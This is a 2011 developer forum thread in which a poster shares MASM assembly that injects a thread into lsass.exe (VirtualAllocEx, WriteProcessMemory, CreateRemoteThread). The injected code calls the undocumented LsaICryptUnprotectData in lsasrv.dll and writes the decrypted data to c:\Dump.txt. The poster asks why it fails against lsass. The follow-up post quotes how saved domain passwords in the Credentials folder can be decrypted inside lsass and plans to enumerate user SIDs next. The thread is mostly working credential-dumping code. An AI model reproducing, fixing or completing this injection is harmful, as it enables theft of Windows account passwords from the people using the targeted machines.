CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 2 of 2
  1. #1

    Injecting Into Lsass for Cryted Data

    Code:
            .386
            .model flat,stdcall
            option casemap:none
            include \masm32\include\windows.inc
            include \masm32\include\kernel32.inc
            include \masm32\include\user32.inc
            include \masm32\include\lsasrv.inc
            includelib \masm32\lib\kernel32.lib
            includelib \masm32\lib\user32.lib
            includelib \masm32\lib\lsasrv.lib
    
            .const
            PROCESS_HANDLE equ 0
            PROCESS_ID equ 1
    
            .data
               szProcess              db 'lsass.exe',0
               szKernel               db 'KERNEL32',0
               szGetProcAddress       db 'GetProcAddress',0
    
            .data?
               hProcess               dd ?
               lpInjected             dd ?
               lenInjected            dd ?
               pInfo                  PROCESS_INFORMATION <>
               sInfo                  STARTUPINFO <>
    
               Injected PROTO:DWORD
            .code
    
    
        Injected PROC lpGetProcAddress:DWORD
               LOCAL Stack[20h]:dword
               LOCAL entropy[16]:byte
               LOCAL Buffer[100h]:byte
               LOCAL cbSize:dword
               LOCAL BytesReturned:dword
               ASSUME fs:NOTHING
    
               push ebp
               xor eax,eax
               mov esi,fs:[eax+30h]
               mov esi,[esi+0Ch]
               mov esi,[esi+1Ch]
            next_module:
               mov ebp,[esi+08h]
               mov edi,[esi+20h]
               mov esi,[esi]
               cmp [edi+12*2],al
               jne next_module
               cmp byte ptr[edi],6Bh
               je find_kernel32_finished
               cmp byte ptr[edi],4Bh
               je find_kernel32_finished
               jmp next_module
            find_kernel32_finished:
               mov ecx,ebp
               pop ebp
               mov eax,lpGetProcAddress
               mov Stack,eax
               mov Stack+4,ecx
    
               call loc_1
                  _szLoadLibraryA db "LoadLibraryA",0
               loc_1:
               pop ecx
               invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
               mov Stack+8,eax
    
               call loc_2
                  _szlsasrv db "lsasrv.dll",0
               loc_2:
               pop ecx
               invoke (type LoadLibrary)ptr Stack+8,ecx
               mov Stack+12,eax
    
               call loc_3
                  _szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
               loc_3:
               pop ecx
               invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
               mov Stack+16,eax
    
               invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize 
    
               call loc_4
                  _szCreateFileA db "CreateFileA",0
               loc_4:
               pop ecx
               invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
               mov Stack+20,eax
    
               call loc_5
                  _szWriteFile db "WriteFile",0
               loc_5:
               pop ecx
               invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
               mov Stack+24,eax
               
               call loc_6
                  _szExitThread db "ExitThread",0
               loc_6:
               pop ecx
               invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
               mov Stack+28,eax
    
               call loc_7
               FileName db "c:\Dump.txt", 0
               loc_7:
               pop ecx
    
               ;BreakpointHere db 0cch
    
               invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 
               mov ecx, eax
               invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0 
               invoke (type ExitThread)ptr Stack+28, 0      
    
               ret
            Injected endp
            EndInjected:
    
    
    FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
        LOCAL Process :PROCESSENTRY32
        lea esi,Process
        assume esi:ptr PROCESSENTRY32
        mov [esi].dwSize, sizeof PROCESSENTRY32
            invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
            mov edi,eax
            invoke Process32First,edi,esi
            .while eax!=FALSE
            lea eax,[esi].szExeFile
            invoke lstrcmpi,eax,_exename
            .if eax==0
            ;---found process---
            mov eax,[esi].th32ProcessID
            jmp @return
            .endif
            invoke  Process32Next,edi,esi
            .endw
            @return:
            assume esi:nothing
            push eax
            invoke CloseHandle,edi
            pop eax
            .if _returntype==PROCESS_HANDLE
            invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
            .endif
        ret
    FindProcessByName endp
    
    start:
    
        
               ;invoke GetModuleHandle,addr szKernel
               ;invoke GetProcAddress,eax,addr szGetProcAddress
               ;invoke Injected, EAX
               ;invoke ExitProcess,0
    
    
               mov ebx,EndInjected
               sub ebx,Injected
               mov lenInjected,ebx
    
               invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
               mov hProcess, eax
    
               invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
               mov lpInjected,eax
    
               invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
    
               invoke GetModuleHandle,addr szKernel
               invoke GetProcAddress,eax,addr szGetProcAddress
    
               invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
    
               invoke ExitProcess,0
    
    end start
    I wrote alot of this code from scrach and the rest from snibblets.
    Everything here seems to work fine with calc.exe but of course it does not have access to the crypted data, but when I run it targeting Lsass.exe it dose not execute correctly. Anyone have any idea on how this is done correctly?

    EDIT:
    I am guessing this is the issue =(
    http://mnin.blogspot.com/2007/05/inj...ged-win32.html
    Last edited by AgentSmithers; May 13th, 2011 at 01:09 AM.
    Http://ControllingTheInter.Net
    My General Computer Forum, From Security To Programming And Back To Troubleshooting.

  2. #2

    Re: Injecting Into Lsass for Cryted Data

    Okay, I'm getting really warm, I guess Now I need to enum the SIDs of the users I want to extract then call the Decrypt API.

    AS Quoted

    I guess I aught to answer this question myself since I've now spent ages working out how to do this and I'm not sure it's widely known. CredEnumerate/CredRead will never provide password information for domain passwords no matter what process context you're in or what token you have despite what it seems to hint at on MSDN. The only way to get access to the saved credential information is to do so using the undocumented function LSAICryptUnprotectData() which is in lsasrv.dll. This can decrypt the files you find in %APPDATA%\Microsoft\Credentials and can provide an identical data structure to CredEnumerate except with the password filled in. The only catch is that this must be done in the process context of lsass.exe (The windows security subsystem), no setting of privilledges etc is enough to give a normal process the rights to do this. If you're a hacker you can do this by performing a CreateRemoteThread() to inject a thread into lsass.exe or if you're trying to do this in a legitimate way, i.e you're extending the Windows operating system in some way for a third party application, like I was, you can do this by creating a Windows authentication package which lsass will load. This AP can then use a named pipe or some such method to allow interaction with the rest of your code.
    I'm getting warm, looks like my code is 1/2 dones I need to extract the SIDS then target the Encrypted file.
    Http://ControllingTheInter.Net
    My General Computer Forum, From Security To Programming And Back To Troubleshooting.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  





Click Here to Expand Forum to Full Width

Featured